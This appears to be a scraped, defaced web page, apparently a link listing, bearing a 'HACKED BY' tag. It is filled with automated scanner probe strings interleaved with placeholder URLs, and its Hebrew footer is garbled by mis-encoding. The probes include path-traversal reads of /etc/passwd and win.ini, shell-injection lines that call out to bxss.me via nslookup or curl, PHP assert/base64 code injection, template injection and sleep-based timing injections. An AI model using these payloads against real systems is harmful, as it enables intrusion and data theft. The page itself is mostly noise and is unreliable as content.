abuda
abudaaa

HACKED BY EL_MUHAMMED

king.cer
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
1KAd0GZ6O
http://www.example.com
/../../../../../../../../../../windows/system32/BITSADMIN.exe
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
response.write(9797635*9809081)
http://www.example.com
http://www.example.com
http://www.example.com
'+response.write(9797635*9809081)+'
http://www.example.com
http://www.example.com
xv0LgEXY
"+response.write(9797635*9809081)+"
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
${9999161+9999491}
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
12345'"\'\");|]*
http://www.example.com
../../../../../../../../../../../../../../etc/passwd
http://www.example.com
http://www.example.com
http://www.example.com
../../../../../../../../../../../../../../windows/win.ini
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
file:///etc/passwd
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
C:\WINDOWS\system32\drivers\etc\hosts
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
../../../../../../../../../../windows/win.ini
http://www.example.com
http://www.example.com&n974768=v963489
http://www.example.com
http://www.example.com
http://www.example.com
/../../../../../../../../../../boot.ini
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯windowsÀ¯win.ini
http://www.example.com
'.gethostbyname(lc('hittc'.'jagemyxee7462.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(90).chr(99).chr(77).'
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
".gethostbyname(lc("hithn"."qdceonka58dae.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(85).chr(114).chr(69)."
http://www.example.com
..\..\..\..\..\..\..\..\windows\win.ini
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
)
http://www.example.com
http://www.example.com
..\..\..\..\..\..\..\..\windows\win.ini
http://www.example.com
!(()&&!|*|*|
http://www.example.com
http://www.example.com
http://www.example.com
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
http://www.example.com
echo sjotoj$()\ shavci\nz^xyu||a #' &echo sjotoj$()\ shavci\nz^xyu||a #|" &echo sjotoj$()\ shavci\nz^xyu||a #
http://www.example.com
^(#$!@#$)(()))******
http://www.example.com
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
http://www.example.com
http://www.example.com
&echo ltdtpb$()\ nybpcb\nz^xyu||a #' &echo ltdtpb$()\ nybpcb\nz^xyu||a #|" &echo ltdtpb$()\ nybpcb\nz^xyu||a #
http://www.example.com
http://www.example.com
http://www.example.com
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com&echo xmzbdy$()\ nqvltf\nz^xyu||a #' &echo xmzbdy$()\ nqvltf\nz^xyu||a #|" &echo xmzbdy$()\ nqvltf\nz^xyu||a #
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
|echo tmdlii$()\ ypcupu\nz^xyu||a #' |echo tmdlii$()\ ypcupu\nz^xyu||a #|" |echo tmdlii$()\ ypcupu\nz^xyu||a #
http://www.example.com
http://www.example.com
WEB-INF/web.xml
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com|echo inrkdd$()\ gduowq\nz^xyu||a #' |echo inrkdd$()\ gduowq\nz^xyu||a #|" |echo inrkdd$()\ gduowq\nz^xyu||a #
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.com
http://www.example.com
WEB-INF\web.xml
http://www.example.com
HttP://bxss.me/t/xss.html?%00
http://www.example.com
(nslookup -q=cname hitrkotadnqnxda595.bxss.me||curl hitrkotadnqnxda595.bxss.me))
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
bxss.me/t/xss.html?%00
$(nslookup -q=cname hitfaqrdavvmb1b43e.bxss.me||curl hitfaqrdavvmb1b43e.bxss.me)
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
&nslookup -q=cname hitgfbnvfzegg3cb57.bxss.me&'\"`0&nslookup -q=cname hitgfbnvfzegg3cb57.bxss.me&`'
http://www.example.com
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
Http://bxss.me/t/fit.txt
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://bxss.me/t/fit.txt?.com
http://www.example.com
|(nslookup -q=cname hitvbworzyfinb3e04.bxss.me||curl hitvbworzyfinb3e04.bxss.me)
http://www.example.com
http://www.example.com
http://www.example.com
/etc/shells
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
`(nslookup -q=cname hitgoynqsmycu31312.bxss.me||curl hitgoynqsmycu31312.bxss.me)`
c:/windows/win.ini
http://www.example.com
http://www.example.com
http://www.example.com
bxss.me
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
';print(md5(31337));$a='
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
";print(md5(31337));$a="
http://www.example.com
http://www.example.com
xfs.bxss.me
'"()
add-link.asp
${@print(md5(31337))}
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
${@print(md5(31337))}\
http://www.example.com
http://www.example.com
http://www.example.com'&&sleep(27*1000)*coyiqq&&'
http://www.example.com
'.print(md5(31337)).'
http://www.example.com
add-link.asp
http://www.example.com
http://www.example.com
http://www.example.com"&&sleep(27*1000)*jkztiu&&"
add-link.asp/.
http://www.example.com
http://www.example.com
'"
http://www.example.com'||sleep(27*1000)*vlatpm||'
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com
http://www.example.com


ëì äæëåéåú ùîåøåú © öøå ÷ùø ùéåå÷ áàéðèøðè äøéåï åìéãä ú÷ðåï åäöäøú ôøèéåú ÷éãåí åä÷îú àúøéí